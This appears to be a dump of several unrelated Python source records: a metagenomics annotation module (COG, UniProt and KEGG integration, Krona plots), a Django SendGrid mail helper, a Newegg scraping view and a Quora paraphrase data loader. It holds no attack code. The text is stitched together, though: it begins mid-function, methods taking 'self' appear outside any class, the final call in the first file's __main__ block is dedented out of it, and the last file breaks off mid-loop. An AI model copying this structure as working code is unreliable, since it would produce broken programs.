    frame = pd.read_csv(cogblast, header=None, skiprows = 1, sep = '\t', low_memory=False)
    # bad formatting in the source file produces extra columns; keep the first
    # fourteen plus the protein description (column 18)
    frame = frame[list(range(14)) + [18]]
    frame.columns = ['qseqid', 'sseqid', 'pident', 'length', 'mismatch', 'gapopen',
                     'qstart', 'qend', 'sstart', 'send', 'evalue', 'bitscore', 'cog',
                     'functional categories', 'COG protein description']
    return frame
'''
Input: the fun.txt file available at ftp://ftp.ncbi.nih.gov/pub/COG/COG/fun.txt
Output: a dictionary in the form {COG category (letter): (COG category (name), COG supercategory)}
'''
def parse_fun(self, fun):
    '''
    Parse NCBI's COG fun.txt file.
    fun: filename of fun.txt (ftp://ftp.ncbi.nih.gov/pub/COG/COG/fun.txt)
    Returns {category letter: [supercategory name, category name]}.
    '''
    with open(fun) as handle:    # fix: file was opened without being closed
        lines = handle.readlines()
    result = dict()
    # the first line is always a supercategory header
    supercategory = lines[0]
    for raw in lines[1:]:
        line = raw.rstrip('\n')
        if '[' in line:
            # category lines look like ' [J] Translation, ...'
            letter = line.split('[')[-1].split(']')[0]
            name = line.split('] ')[-1]
            result[letter] = [supercategory.rstrip('\n'), name]
        else:
            # any line without brackets starts a new supercategory
            supercategory = line
    return result
'''
Input:
blast: name of the file from the DIAMOND annotation
uniprotinfo: name of the uniprot information file
cog_blast: name of the COG annotation file from self.annotate_cogs
fun: name of the fun.txt file
split_pathways: boolean, if MOSCA should split the information from the
Pathway column provided by UniProt mapping
readcounts_matrix: name of the file containing protein expression
Output:
pandas.DataFrame with integration of information from UniProt and COGs
'''
def join_reports(self, blast, uniprotinfo, cog_blast,
                 fun = 'MOSCA/Databases/COG/fun.txt', split_pathways = False):
    '''
    Integrate BLAST, UniProt and COG annotations into one DataFrame keyed by
    UniProt entry ('Protein ID' in the result).
    blast: DIAMOND annotation file
    uniprotinfo: UniProt information TSV
    cog_blast: COG annotation file from self.annotate_cogs
    fun: fun.txt file with COG functional categories
    split_pathways: if True, expand UniProt 'Pathway' into Super/Pathway/Sub columns
    Returns the integrated pandas.DataFrame.
    '''
    result = mtools.parse_blast(blast)
    result.index = result.qseqid
    result = result[result.sseqid != '*']      # drop unidentified proteins
    # sseqid has the form db|ACCESSION|name
    result['Entry'] = [ide.split('|')[1] for ide in result.sseqid]
    uniprotinfo = pd.read_csv(uniprotinfo, sep= '\t', low_memory=False).drop_duplicates()
    if split_pathways == True: # TODO - the reorganization of pathways incurs in extra lines for same IDs. Find workaround
        print('Reorganizing pathways information.')
        funcdf = uniprotinfo[uniprotinfo.Pathway.notnull()][['Entry','Pathway']]
        funcdf.Pathway = funcdf.Pathway.apply(self.split)
        funcdf = self.using_repeat(funcdf)
        # split 'Super; Pathway; Sub' strings into three columns, padding with NaN
        pathways = pd.DataFrame([(path.split('; ') + [np.nan] * (3 - len(path.split('; '))))
                                 for path in funcdf.Pathway], index = funcdf.index)
        pathways.columns = ['Superpathway','Pathway','Subpathway']
        del funcdf['Pathway']; del uniprotinfo['Pathway']
        funcdf = pd.concat([pathways, funcdf], axis = 1)
        uniprotinfo = pd.merge(uniprotinfo, funcdf, on = ['Entry'], how = 'outer')
    result = pd.merge(result, uniprotinfo, on = ['Entry'], how = 'outer')
    cog_blast = self.organize_cdd_blast(cog_blast, fun)
    result = pd.merge(result, cog_blast, on = ['qseqid'], how = 'outer')
    print('Defining best consensus COG for each UniProt ID.')
    cogs_df = pd.DataFrame()
    tqdm.pandas()
    # the most frequent COG per entry wins
    cogs_df['cog'] = result.groupby('Entry')['cog'].progress_apply(lambda x:
        x.value_counts().index[0] if len(x.value_counts().index) > 0 else np.nan)
    cogs_relation = result[['COG general functional category','COG functional category',
                            'COG protein description','cog']]
    cogs_df['Entry'] = cogs_df.index
    cogs_relation = cogs_relation.drop_duplicates()
    cogs_df = cogs_df[cogs_df['cog'].notnull()]
    cogs_df = pd.merge(cogs_df, cogs_relation, on = 'cog', how = 'inner')
    # replace the per-row COG columns with the per-entry consensus built above
    result.drop(['COG general functional category', 'COG functional category',
                 'COG protein description', 'cog'], axis=1, inplace=True)
    result = pd.merge(result, cogs_df, on = 'Entry', how = 'outer')
    result = result[['Entry','Taxonomic lineage (SUPERKINGDOM)',
                     'Taxonomic lineage (PHYLUM)','Taxonomic lineage (CLASS)',
                     'Taxonomic lineage (ORDER)','Taxonomic lineage (FAMILY)',
                     'Taxonomic lineage (GENUS)','Taxonomic lineage (SPECIES)',
                     'EC number', 'Ensembl transcript','Function [CC]', 'Gene names',
                     'Gene ontology (GO)', 'Keywords','Pathway', 'Protein existence',
                     'Protein families', 'Protein names','Cross-reference (BRENDA)',
                     'Cross-reference (BioCyc)','Cross-reference (CDD)',
                     'Cross-reference (InterPro)','Cross-reference (KEGG)',
                     'Cross-reference (KO)','Cross-reference (Pfam)',
                     'Cross-reference (Reactome)','Cross-reference (RefSeq)',
                     'Cross-reference (UniPathway)','Cross-reference (eggNOG)',
                     'COG general functional category', 'COG functional category',
                     'COG protein description','cog']]
    result.columns = ['Protein ID'] + result.columns.tolist()[1:]
    result = result.drop_duplicates()
    return result
def run(self):
    '''Execute the annotation workflow: gene calling, then annotation.'''
    annotation_dir = self.out_dir + '/Annotation/' + self.name
    self.gene_calling(self.file, annotation_dir, self.assembled)
    self.annotation()
'''
Input:
faa: FASTA file with protein sequences to be annotated
output: name of folder where to output results
cog: name of COG
cddid: name of cddid.tbl file for COG analysis
whog: name of whog file for COG analysis
fun: name of fun.txt file for COG analysis
databases: LIST, name of databases in format for COG analysis
threads: STR, number of threads to use
Output:
pandas.DataFrame with abundance and expression information
'''
def cog_annotation(self, faa, output, cddid = 'MOSCA/Databases/COG/cddid.tbl',
                   whog = 'MOSCA/Databases/COG/whog', fun = 'MOSCA/Databases/COG/fun.txt',
                   databases = None, threads = '8'):
    '''
    Functionally annotate `faa` against the COG database: build the split
    profile databases, run RPS-BLAST recursively, convert CDD hits to COGs
    and write the Krona-ready counts EXCEL.
    faa: FASTA file with protein sequences to be annotated
    output: folder where results are written
    cddid, whog, fun: COG auxiliary files
    databases: LIST of database basenames for RPS-BLAST; computed if None
    threads: STR, number of threads to use
    '''
    self.create_split_cog_db('MOSCA/Databases/COG', 'MOSCA/Databases/COG/Cog', threads = threads)
    if databases is None:    # fix: the parameter used to be ignored and always recomputed
        pns = glob.glob('./MOSCA/Databases/COG/Cog_' + threads + '_*.pn')
        databases = [pn.split('.pn')[0] for pn in pns]
    self.run_recursively_rpsblast(faa, output + '/cdd_aligned.blast', ' '.join(databases))
    # the cdd2cog tool does not overwrite, and fails if a results directory already exists
    if os.path.isdir(os.getcwd() + '/results'):
        print('Eliminating ' + os.getcwd() + '/results')
        shutil.rmtree(os.getcwd() + '/results', ignore_errors=True)
    self.annotate_cogs(output + '/cdd_aligned.blast', output, cddid, fun, whog)
    self.write_cogblast(output + '/results/rps-blast_cog.txt', output + '/cogs.xlsx')
def set_to_uniprotID(self, fasta, aligned, output):
    '''
    Rename the sequences of `fasta` to the UniProt identifications they
    aligned to in `aligned`, writing the renamed FASTA to `output`.
    Sequences with zero or multiple hits are reported and skipped.
    '''
    pbar = ProgressBar()
    result = mtools.parse_blast(aligned)
    sequences = mtools.parse_fasta(fasta)
    print('Changing names of ' + fasta + '\nto identifications in ' + aligned + '\nand outputing to ' + output)
    with open(output, 'w') as f:
        for key, value in pbar(sequences.items()):
            matches = result[result.qseqid == key]['sseqid']
            if len(matches) == 1:   # .item() only works for exactly one hit
                f.write('>' + str(matches.item()) + '\n' + value + '\n')
            else:
                # previously a bare except around .item(); report and skip instead
                print(matches)
def global_information(self):
    '''
    Join all per-sample annotation information: merge FASTA/BLAST files,
    retrieve UniProt information, run COG annotation, integrate everything
    into one table with per-sample abundance, export it as TSV and XLSX and
    build Krona plots. Returns the joined pandas.DataFrame.
    '''
    # Join reports
    if not os.path.isfile(self.out_dir + '/Annotation/fgs.faa'):
        mtools.run_command('cat ' + ' '.join(glob.glob(self.out_dir + '/Annotation/*/fgs.faa')),
                           self.out_dir + '/Annotation/fgs.faa')
    if not os.path.isfile(self.out_dir + '/Annotation/aligned.blast'):
        mtools.run_command('cat ' + ' '.join(glob.glob(self.out_dir + '/Annotation/*/aligned.blast')),
                           file = self.out_dir + '/Annotation/aligned.blast')
    # Retrieval of information from UniProt IDs
    self.recursive_uniprot_information(self.out_dir + '/Annotation/aligned.blast',
                                       self.out_dir + '/Annotation/uniprot_info.tsv',
                                       columns = self.columns,
                                       databases = self.databases)
    # Functional annotation with COG database
    self.cog_annotation(self.out_dir + '/Annotation/fgs.faa',
                        self.out_dir + '/Annotation', threads = self.threads)
    # Integration of all reports - BLAST, UNIPROTINFO, COG
    joined = self.join_reports(self.out_dir + '/Annotation/aligned.blast',
                               self.out_dir + '/Annotation/uniprot_info.tsv',
                               self.out_dir + '/Annotation/results/rps-blast_cog.txt')
    mg_names = list()
    blast_files = glob.glob(self.out_dir + '/Annotation/*/aligned.blast')
    for file in blast_files:
        mg_name = file.split('/')[-2]
        # quantify expression per sample with htseq-count and add it to `joined`
        mtools.build_gff_from_contigs(self.out_dir + '/Assembly/' + mg_name + '/contigs.fasta',
                                      self.out_dir + '/Assembly/' + mg_name + '/quality_control/alignment.gff')
        mtools.run_htseq_count(self.out_dir + '/Assembly/' + mg_name + '/quality_control/alignment.sam',
                               self.out_dir + '/Assembly/' + mg_name + '/quality_control/alignment.gff',
                               self.out_dir + '/Assembly/' + mg_name + '/quality_control/alignment.readcounts',
                               stranded = False)
        joined = mtools.define_abundance(joined,
                                         readcounts = self.out_dir + '/Assembly/' + mg_name +
                                         '/quality_control/alignment.readcounts', blast = file)
        mg_names.append(mg_name)
    if os.path.isfile(self.out_dir + '/joined_information.xlsx'):
        os.remove(self.out_dir + '/joined_information.xlsx')
    joined.to_csv(self.out_dir + '/joined_information.tsv', index=False, sep='\t')
    print('joined was written to ' + self.out_dir + '/joined_information.tsv')
    writer = pd.ExcelWriter(self.out_dir + '/joined_information.xlsx',
                            engine='xlsxwriter')
    i = 0
    j = 1
    # Excel sheets hold at most 1048576 rows; split the table across sheets
    while i + 1048575 < len(joined):
        joined.iloc[i:(i + 1048575)].to_excel(writer, sheet_name='Sheet ' + str(j), index = False)
        i += 1048575    # fix: i was never advanced, looping forever on large tables
        j += 1
    joined.iloc[i:len(joined)].to_excel(writer, sheet_name='Sheet ' + str(j), index = False)
    writer.close()      # fix: the writer was never saved, so the XLSX was never produced
    print('joined was written to ' + self.out_dir + '/joined_information.xlsx')
    self.joined2kronas(self.out_dir + '/joined_information.tsv',
                       output = self.out_dir + '/Annotation/krona',
                       mg_columns = mg_names)
    return joined
'''
UniProt regularly updates its databases. As we are working with MG here, many
identifications will sometimes pertain to ORFs or pseudogenes that have been
wrongly predicted to code for proteins. It may also happen that the original
authors decided to withdraw their published sequences.
Input:
uniprotinfo: name of UniProt info file
Output:
Rows in UniProt info file that lack a species identification will be
updated to include that new information
'''
def info_from_no_species(self, uniprotinfo):
    '''
    Re-query UniProt for entries in `uniprotinfo` that lack a species-level
    taxonomic identification, to refresh records that UniProt has updated or
    withdrawn.
    NOTE(review): debug-quality code — results go to the hard-coded 'test.tsv'
    and the original file is never updated; the assignment into
    `missing_uniprotinfo` operates on a filtered copy and does not propagate
    back to `uniprotinfo` (pandas SettingWithCopy).
    '''
    uniprotinfo = pd.read_csv(uniprotinfo, sep = '\t')
    missing_uniprotinfo = uniprotinfo[uniprotinfo['Taxonomic lineage (SPECIES)'].isnull()]
    ids = list(set([ide for ide in missing_uniprotinfo['Entry']]))
    new_uniprotinfo = self.get_uniprot_information(ids)
    print(missing_uniprotinfo)
    for entry in new_uniprotinfo['Entry']:
        # replace stale rows with the freshly retrieved ones
        missing_uniprotinfo[missing_uniprotinfo['Entry'] == entry] = new_uniprotinfo[new_uniprotinfo['Entry'] == entry]
    print(missing_uniprotinfo)
    print(new_uniprotinfo)
    print(new_uniprotinfo[new_uniprotinfo['Taxonomic lineage (SPECIES)'].notnull()]['Taxonomic lineage (SPECIES)'])
    new_uniprotinfo.to_csv('test.tsv', sep = '\t', index = False)
'''
Input:
smp_directory: foldername where the SMP files are. These files are
obtained from ftp://ftp.ncbi.nih.gov/pub/mmdb/cdd/cdd.tar.gz
output: basename for PN and databases
threads: STR, number of threads that the workflow will use
step: number of SMP files per database
Output:
threads - 1 databases will be output, each with a consecutive part of
the list of SMP files available. These databases are formatted for RPS-BLAST
search
'''
def create_split_cog_db(self, smp_directory, output, threads = '6', step = None):
    '''
    Split the COG SMP files into several RPS-BLAST profile databases so they
    can be searched in parallel.
    smp_directory: folder holding the SMP files (from NCBI's cdd.tar.gz)
    output: basename for the .pn list files and the generated databases
    threads: STR, number of threads the workflow will use (also the cache key)
    step: number of SMP files per database; defaults to len(smp_list)/threads
    '''
    # databases.txt caches which thread counts already have databases built
    dbs = (open('MOSCA/Databases/COG/databases.txt').read().split('\n') if
           os.path.isfile('MOSCA/Databases/COG/databases.txt') else list())
    if threads in dbs:
        print('Already built COG database for [' + threads + '] threads.')
    else:
        print('Generating COG databases for [' + threads + '] threads.')
        smp_list = glob.glob(smp_directory + '/COG*.smp')
        if step is None:
            step = round(len(smp_list) / float(threads))
        i = 0
        pn_files = list()
        output += '_' + threads + '_'
        # write consecutive chunks of SMP paths into numbered .pn list files
        while i + step < len(smp_list):
            pn_files.append(output + str(int(i / step)) + '.pn')
            open(output + str(int(i / step)) + '.pn', 'w').write('\n'.join(smp_list[i:i + step]))
            i += step
        # the remainder goes into one final .pn file
        open(output + str(int(i / step)) + '.pn', 'w').write('\n'.join(smp_list[i:len(smp_list)]))
        pn_files.append(output + str(int(i / step)) + '.pn')
        for file in pn_files:
            mtools.run_command('makeprofiledb -in ' + file + ' -title ' + file.split('.pn')[0] +
                               ' -out ' + file.split('.pn')[0]) # -title and -out options are defaulted as input file name to -in argument; -dbtype default is 'rps'
        open('MOSCA/Databases/COG/databases.txt','w').write('\n'.join(dbs + [threads]))
def kegg_mapper(self, ids, output, step = 50):
    '''
    Map UniProt IDs to KEGG genes through the KEGG REST 'conv' service,
    `step` IDs per request.
    ids: list of UniProt IDs
    output: filename where each raw response is downloaded
    Returns (pd.DataFrame of mappings, list of IDs whose chunk failed).
    '''
    result = pd.DataFrame()
    ids_failed = list()
    for i in range(0, len(ids), step):   # fix: 'len(ids) - step' dropped the final chunk entirely
        try:
            url = 'http://rest.kegg.jp/conv/genes/uniprot:' + '+uniprot:'.join(ids[i:i+step])
            bashCommand = 'wget ' + url + ' -O ' + output
            mtools.run_command(bashCommand)
            result = pd.concat([result, pd.read_csv(output, sep='\t', header=None)])
            # fix: str(round(x), 2) raised TypeError, which the except below
            # swallowed — every chunk was being reported as failed
            print(str(round(i / len(ids) * 100, 2)) + '% done')
            print('Already gathered ' + str(len(result)) + ' ids.')
        except Exception:                # narrowed from bare except
            ids_failed += ids[i:i+step]
            print('Mapping failed for some IDs.')
    return result, ids_failed
'''
Input:
tsv: filename of TSV file to be inputed. Must have the format
value\tcategorie1\tcategorie2\t..., with no header
output: filename of HTML krona plot to output
Output:
A krona plot will be created at output if it has been specified, else
at tsv.replace('.tsv','.html')
'''
def create_krona_plot(self, tsv, output = None):
    '''
    Build an HTML Krona plot from `tsv` (rows of value\tcat1\tcat2\t..., no
    header). When `output` is None, the plot goes to `tsv` with an .html
    extension.
    '''
    destination = output if output is not None else tsv.replace('.tsv', '.html')
    mtools.run_command('ktImportText {} {}'.format(tsv, destination))
'''
Input:
tsv: filename of MOSCA result from analysis
output: basename for krona plots
mg_columns: names of columns with abundances from which to build krona plots
Output:
'''
def joined2kronas(self, joined, output, mg_columns,
                  taxonomy_columns = ['Taxonomic lineage (SUPERKINGDOM)',
                                      'Taxonomic lineage (PHYLUM)',
                                      'Taxonomic lineage (CLASS)',
                                      'Taxonomic lineage (ORDER)',
                                      'Taxonomic lineage (FAMILY)',
                                      'Taxonomic lineage (GENUS)',
                                      'Taxonomic lineage (SPECIES)'],
                  functional_columns = ['COG general functional category',
                                        'COG functional category',
                                        'COG protein description']):
    '''
    Build taxonomic and functional Krona plots for each abundance column.
    joined: TSV filename of the MOSCA analysis result
    output: basename for the Krona plot files
    mg_columns: names of abundance columns to plot
    (the list defaults are read-only, so sharing them between calls is safe)
    '''
    data = pd.read_csv(joined, sep = '\t')
    for name in mg_columns:
        # fix: the plots used to be requested for '<output>_tax.tsv' and
        # '<output>_fun.tsv', files that were never written — the per-sample
        # name was missing from the filename
        tax_tsv = output + '_{}_tax.tsv'.format(name)
        data[[name] + taxonomy_columns].to_csv(tax_tsv, sep = '\t',
                                               index = False, header = False)
        self.create_krona_plot(tax_tsv)
        fun_tsv = output + '_{}_fun.tsv'.format(name)
        data[[name] + functional_columns].to_csv(fun_tsv, sep = '\t',
                                                 index = False, header = False)
        self.create_krona_plot(fun_tsv)
if __name__ == '__main__':
    # Ad-hoc debugging scratchpad: the alternative workflows below were kept
    # commented out; only the Annotater construction at the bottom (and the
    # cog_annotation call that follows it) is live.
    '''
    ids = DIAMOND(out = 'MOSCAfinal/Annotation/joined/aligned.blast').parse_result()['sseqid']
    ids = [ide.split('|')[1] for ide in ids if ide != '*']
    '''
    '''
    print(os.getcwd())
    ui = pd.read_csv('uniprot.info',sep='\t')
    found_ids = ui['Entry'].tolist()
    all_ids = open('ids_missing.txt').readlines()[0].rstrip('\n').split(',')
    missing_ids = [ide for ide in all_ids if ide not in found_ids]
    print('Found IDs: ' + str(len(found_ids)))
    print('Missing IDs: ' + str(len(missing_ids)))
    '''
    '''
    annotater = Annotater()
    result = annotater.recursive_uniprot_information('MOSCAfinal/Annotation/aligned.blast',
                                                     'MOSCAfinal/Annotation/uniprot.info1')
    '''
    #result = pd.concat([result, ui])
    #result.to_csv('uniprot.info',sep='\t',index=False)
    '''
    mosca_dir = os.path.dirname(os.path.realpath(__file__))
    annotater = Annotater(out_dir = 'MGMP',
                          fun = mosca_dir + '/Databases/COG/fun.txt',
                          cog = mosca_dir + '/Databases/COG/Cog',
                          cddid = mosca_dir + '/Databases/COG/cddid.tbl',
                          whog = mosca_dir + '/Databases/COG/whog',
                          cdd2cog_executable = mosca_dir + '/cdd2cog.pl')
    annotater.global_information()
    '''
    annotater = Annotater(out_dir = 'MOSCAfinal', threads = '1')
annotater.cog_annotation('MOSCAfinal/Annotation/fgs_failed.faa', 'debugCOG',
threads = '12') |
18,719 | c50bb0a1532240d19a94be3a8859854e5c8ca1e7 | import requests
from django.core import validators
from audienceSutra_beta_src.utilities.email_template import verify_email_template
from ..accounts.models import EmailLogs, EmailTemplate
import sendgrid
import os
class MailHelper():
    '''Helpers for sending templated e-mail through SendGrid and logging the result.'''

    def send_external_mail(self, to_email, subject, message, email_name, additional_data=None, extra_details=None):
        '''
        Send `message` to `to_email` using the EmailTemplate named `email_name`.
        Falls back to notifying support when no such template exists.
        '''
        # fix: mutable default arguments ({}) are shared between calls
        additional_data = additional_data if additional_data is not None else {}
        extra_details = extra_details if extra_details is not None else {}
        email_template = EmailTemplate.objects.filter(email_name=email_name).first()
        if email_template:
            MailHelper.sendgrid_mail(to_email=to_email, subject=subject, message=message,
                                     email_template=email_template, additional_data=additional_data,
                                     extra_details=extra_details)
        else:
            message = "Email not Sent"
            MailHelper.sendgrid_mail(to_email='support@audiencesutra.com', subject=subject, message=message,
                                     email_template=email_template, additional_data=additional_data,
                                     extra_details=extra_details)

    @staticmethod
    def sendgrid_mail(to_email, subject, message, email_template, additional_data, extra_details):
        '''Deliver one HTML mail via SendGrid and record it in EmailLogs.'''
        sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
        # fix: email_template may be None (missing-template path of
        # send_external_mail), which previously raised AttributeError here
        if email_template is not None and email_template.email_type == 'welcome':
            from_email = "support@audiencesutra.com"
        else:
            from_email = "contact-us@audiencesutra.com"
        data = {
            "personalizations": [
                {
                    "to": [
                        {
                            "email": to_email
                        }
                    ],
                    "subject": subject
                }
            ],
            "from": {
                "email": from_email,
                "name": "AudienceSutra"
            },
            "content": [
                {
                    "type": "text/html",
                    "value": message
                }
            ]
        }
        if email_template is not None:
            data["categories"] = [email_template.email_category]
        response = sg.client.mail.send.post(request_body=data)
        sendgrid_id = response.headers['X-Message-Id']
        email_log = EmailLogs.objects.create(
            sendgrid_id=sendgrid_id,
            email_template_id=email_template.id if email_template is not None else None,
            sent_to=to_email
        )
        # fix: dict_items objects do not support '+' in Python 3; merge the dicts
        email_log.extra_details = {**extra_details, **additional_data}
        email_log.save()
def get_attachments_mailgun(attachments):
    '''
    Turn a list of file paths into Mailgun-style ('attachment', fileobj)
    tuples. Returns an empty list when `attachments` is falsy.
    '''
    if not attachments:
        return []
    # fix: open in binary mode — attachments are arbitrary (possibly binary) files,
    # and text-mode reads would corrupt or fail on them
    return [("attachment", open(file_path, "rb")) for file_path in attachments]
def verify_email(user):
    '''Return True if `user.email` is a syntactically valid e-mail address.'''
    try:
        validators.validate_email(str(user.email).strip())
        return True
    except Exception:
        # narrowed from bare except (which also swallowed KeyboardInterrupt/SystemExit);
        # Exception still covers ValidationError and a missing/odd email attribute
        return False
|
18,720 | 6774c13af377ed8ad0a48ea260207153a7a5f0de | from django.shortcuts import render
import requests
from django.http import JsonResponse
import bs4
from django.conf import Settings
from crawler import models
# Create your views here.
class Crawler:
    '''Small wrapper around one HTTP request whose response can be parsed with BeautifulSoup.'''

    def __init__(self, url, method='GET'):
        self.url = url
        self.method = method
        self._response = None

    @property
    def content(self):
        # A falsy response (none yet, or a non-OK requests.Response) yields no content.
        if not self._response:
            return None
        return self._response.content

    def send(self):
        '''Perform the HTTP request and keep the response for later parsing.'''
        self._response = requests.request(self.method, self.url)

    def to_bs4(self):
        '''Parse the fetched content with BeautifulSoup, or None when nothing was fetched.'''
        if not self.content:
            return None
        return bs4.BeautifulSoup(self.content, features='lxml')

    def build_url(self):
        # Subclasses define how to build their target URL.
        raise NotImplementedError
class NeweggCrawler(Crawler):
    """Crawler specialised for Newegg product pages."""

    def __init__(self, code):
        # The product code must be set before build_url() can use it.
        self.code = code
        super().__init__(self.build_url())

    def build_url(self):
        """Return the product-page URL for this item code."""
        base_url = 'https://www.newegg.com'
        return '{base_url}/p/{code}'.format(base_url=base_url, code=self.code)
class Element:
    """Base class for one scraped attribute of a parsed DOM."""

    def __init__(self, dom):
        self.dom = dom

    def parse(self):
        """Extract this element's value from ``self.dom``."""
        raise NotImplementedError
class TitleElement(Element):
    """Product title: text of the ``<h1 class="product-title">`` node."""

    def parse(self):
        node = self.dom.body.find('h1', class_='product-title')
        return node.text
class PriceElement(Element):
    """Current price: text of the ``<li class="price-current">`` node."""

    def parse(self):
        node = self.dom.body.find('li', class_='price-current')
        return node.text
class Parser:
    """Run every Element class listed in ``Meta.attrs`` against one DOM."""

    def __init__(self, dom):
        self.dom = dom

    def _get_element(self):
        # Pair each configured attribute name with its Element class.
        return [(name, getattr(self, name)) for name in self.Meta.attrs]

    def get_results(self):
        """Return ``{attr_name: parsed_value}`` for all configured elements."""
        return {
            name: element_cls(self.dom).parse()
            for name, element_cls in self._get_element()
        }
class NeweggParser(Parser):
    """Parser configuration for Newegg product pages."""

    class Meta:
        # Attribute names to extract, in output order.
        attrs = ('title', 'price')

    title = TitleElement
    price = PriceElement
def newegg(request, code):
    """Fetch a Newegg product page, persist title/price, return them as JSON."""
    crawler = NeweggCrawler(code)
    crawler.send()
    parsed = NeweggParser(crawler.to_bs4()).get_results()
    # Persist the scraped values before answering the request.
    models.Product(title=parsed['title'], price=parsed['price']).save()
    return JsonResponse(parsed)
|
18,721 | 56a17affa6ff2d299bc0aa9cad01422cbd6c0492 |
import csv, re, pickle
from tqdm import tqdm
from collections import Counter
import numpy as np
# Normalise free text: drop quotes/slashes, lowercase, then delete punctuation.
# NOTE(review): inside the character class the unescaped `):-\[` forms a RANGE
# (ASCII 0x3A-0x5B), so ; < = > ? @ and A-Z are removed as well — harmless for
# A-Z after .lower(), but confirm the extra symbols are intended (this matches
# the widely-copied BioASQ "bioclean" snippet).
bioclean = lambda t: re.sub('[.,?;*!%^&_+():-\[\]{}]', '', t.replace('"', '').replace('/', '').replace('\\', '').replace("'", '').strip().lower())
def check_texts(text1, text2):
    """Decide whether (text1, text2) is a usable paraphrase training pair.

    Rejects the pair when either side is empty, either side has <= 3 tokens,
    one string is a character prefix of the other, or every word of text1
    already occurs in text2 (near-duplicate).

    Returns:
        True if the pair should be kept, False otherwise.
    """
    if not text1 or not text2:
        return False
    words1 = text1.split()
    words2 = text2.split()
    if len(words1) <= 3 or len(words2) <= 3:
        return False
    # Reject exact prefixes in either direction.
    if text1 == text2[:len(text1)] or text2 == text1[:len(text2)]:
        return False
    # Build the word set once — the original rebuilt set(text2.split()) for
    # every single word of text1 — and reject subset vocabularies.
    if set(words1) <= set(words2):
        return False
    return True
class DataHandler:
    """Load the Quora duplicate-questions TSV and serve padded seq2seq batches.

    Builds a symmetric paraphrase corpus (each kept pair is used in both
    directions), a frequency-thresholded vocabulary, and length-sorted
    train/dev instance lists.
    """
    def __init__(self, data_path= '/home/dpappas/quora_duplicate_questions.tsv', occur_thresh=5, valid_split=0.1):
        self.to_text, self.from_text = [], []
        self.occur_thresh = occur_thresh
        self.data_path = data_path
        ################################################
        with open(data_path, 'rt', encoding='utf8') as tsvin:
            tsvin = csv.reader(tsvin, delimiter='\t')
            headers = next(tsvin)
            del(headers)
            for row in tqdm(tsvin, total=404291, desc='Reading file', ascii=True):
                ################################################
                # Columns 3/4 hold the two question texts.
                text1 = bioclean(row[3])
                text2 = bioclean(row[4])
                ################################################
                if(not check_texts(text1, text2)):
                    continue
                ################################################
                # Keep each pair in both directions (1->2 and 2->1).
                self.from_text.append(text1)
                self.from_text.append(text2)
                self.to_text.append(text2)
                self.to_text.append(text1)
        ################################################
        print('Created {} examples'.format(len(self.from_text)))
        ################################################
        # Head of the list trains, tail evaluates (no shuffling).
        self.train_from_text = self.from_text[:int(len(self.from_text)*(1. - valid_split))]
        self.train_to_text = self.to_text[:int(len(self.to_text)*(1. - valid_split))]
        self.dev_from_text = self.from_text[-int(len(self.from_text)*(valid_split)):]
        self.dev_to_text = self.to_text[-int(len(self.to_text)*(valid_split)):]
        print('FROM: kept {} instances for training and {} for eval'.format(len(self.train_from_text), len(self.dev_from_text)))
        print('TO: kept {} instances for training and {} for eval'.format(len(self.train_to_text), len(self.dev_to_text)))
        del(self.to_text)
        del(self.from_text)
        ################################################ SORT INSTANCES BY SIZE
        # Sort by (src length, trg length) so each batch has similar lengths
        # and padding stays minimal.
        self.train_instances = sorted(list(zip(self.train_from_text, self.train_to_text)), key= lambda x: len(x[0].split())*10000+len(x[1].split()))
        self.dev_instances = sorted(list(zip(self.dev_from_text, self.dev_to_text)), key= lambda x: len(x[0].split())*10000+len(x[1].split()))
        self.number_of_train_instances = len(self.train_instances)
        self.number_of_dev_instances = len(self.dev_instances)
        # print('{} instances for training and {} for eval'.format(len(self.train_instances), len(self.dev_instances)))
        # # print(self.dev_instances[0])
        # # print(self.train_instances[0])
        ################################################
        # Word frequencies over the training split only.
        self.vocab = Counter()
        self.vocab.update(Counter(' '.join(self.train_from_text).split()))
        self.vocab.update(Counter(' '.join(self.train_to_text).split()))
        ################################################
        # Drop rare words, order the rest by frequency (self.vocab is still
        # the Counter while this comprehension evaluates).
        self.vocab = sorted([
            word
            for word in tqdm(self.vocab, desc='Building VOCAB', ascii=True)
            if(self.vocab[word]>=self.occur_thresh)
        ], key= lambda x: self.vocab[x])
        # Special tokens occupy the first four indices.
        self.vocab = ['<PAD>', '<UNK>', '<SOS>', '<EOS>'] + self.vocab
        self.itos = dict(enumerate(self.vocab))
        self.stoi = dict((v, k) for k,v in self.itos.items())
        self.vocab_size = len(self.vocab)
        print('Kept {} total words'.format(len(self.vocab)))
        ################################################
        self.unk_token = '<UNK>'
        self.pad_token = '<PAD>'
        self.unk_index = self.stoi['<UNK>']
        self.pad_index = self.stoi['<PAD>']
        ################################################
    def fix_one_batch(self, batch):
        """Right-pad src/trg id lists to the batch maximum; returns np arrays."""
        max_len_s = max([len(row) for row in batch['src_ids']])
        max_len_t = max([len(row) for row in batch['trg_ids']])
        batch['src_ids'] = np.array([row + ([self.stoi['<PAD>']] * (max_len_s - len(row))) for row in batch['src_ids']])
        batch['trg_ids'] = np.array([row + ([self.stoi['<PAD>']] * (max_len_t - len(row))) for row in batch['trg_ids']])
        return batch
    def iter_train_batches(self, batch_size):
        """Yield padded training batches of *batch_size* (last one may be short)."""
        self.train_total_batches = int(len(self.train_instances) / batch_size)
        # pbar = tqdm(total=self.train_total_batches+1)
        batch = {'src_ids': [], 'trg_ids': []}
        for text_s, text_t in self.train_instances:
            batch['src_ids'].append([self.stoi[token] if token in self.stoi else self.stoi['<UNK>'] for token in text_s.split()])
            batch['trg_ids'].append([self.stoi[token] if token in self.stoi else self.stoi['<UNK>'] for token in text_t.split()])
            if(len(batch['src_ids']) == batch_size):
                # pbar.update(1)
                yield self.fix_one_batch(batch)
                batch = {'src_ids': [], 'trg_ids': []}
        if(len(batch['src_ids'])):
            # pbar.update(1)
            yield self.fix_one_batch(batch)
    def iter_dev_batches(self, batch_size):
        """Yield padded dev batches of *batch_size* (last one may be short)."""
        self.dev_total_batches = int(len(self.dev_instances) / batch_size)
        # pbar = tqdm(total=self.dev_total_batches+1, ascii=True)
        batch = {'src_ids': [], 'trg_ids': []}
        for text_s, text_t in self.dev_instances:
            batch['src_ids'].append([self.stoi[token] if token in self.stoi else self.stoi['<UNK>'] for token in text_s.split()])
            batch['trg_ids'].append([self.stoi[token] if token in self.stoi else self.stoi['<UNK>'] for token in text_t.split()])
            if(len(batch['src_ids']) == batch_size):
                # pbar.update(1)
